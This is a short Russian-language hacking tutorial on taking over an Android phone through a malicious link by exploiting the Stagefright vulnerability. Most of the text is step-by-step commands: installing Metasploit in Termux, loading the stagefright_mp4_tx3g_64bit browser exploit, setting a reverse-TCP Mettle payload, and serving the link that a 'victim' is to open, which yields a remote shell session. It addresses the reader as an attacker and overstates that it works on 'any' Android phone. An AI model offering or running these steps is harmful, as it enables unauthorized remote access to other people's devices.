Взлом Android ссылкой
Расскажем, как взломать любой Андроид смартфон обычной ссылкой! Получим удаленный доступ.
Обнаружили ряд серьезных уязвимостей в одном из компонентов ядра мобильной ОС Android под названием Stagefright.
Для реализации атаки нам будет достаточно заставить жертву перейти по вредоносной ссылке, чтобы получить удаленный доступ к Android.
Устанавливаем Metasploit Framework
Обновляем пакеты с помощью команды:
pkg update && pkg upgrade
Далее устанавливаем все необходимые библиотеки:
pkg install unstable-repo pkg install x11-repo
pkg install metasploit
Ожидаем окончание процесса установки.
Эксплуатируем Stagefright
Открываем Metasploit с помощью команды:
msfconsole
Далее задействуем эксплойт для эксплуатации уязвимости:
exploit/android/browser/stagefright_mp4_tx3g_64bit
Выставляем значение нашего IP-адреса:
set SRVHOST <ip-адрес> set LHOST <ip-адрес>
Теперь прописываем следующие параметры:
set URIPATH / set PAYLOAD linux/armle/mettle/reverse_tcp set VERBOSE true
exploit -j
В открывшемся окне появится вредоносная ссылка, по которой должна перейти наша жертва. Если жертва перейдет по ней, то в нашем терминале откроется сессия для удаленного доступа.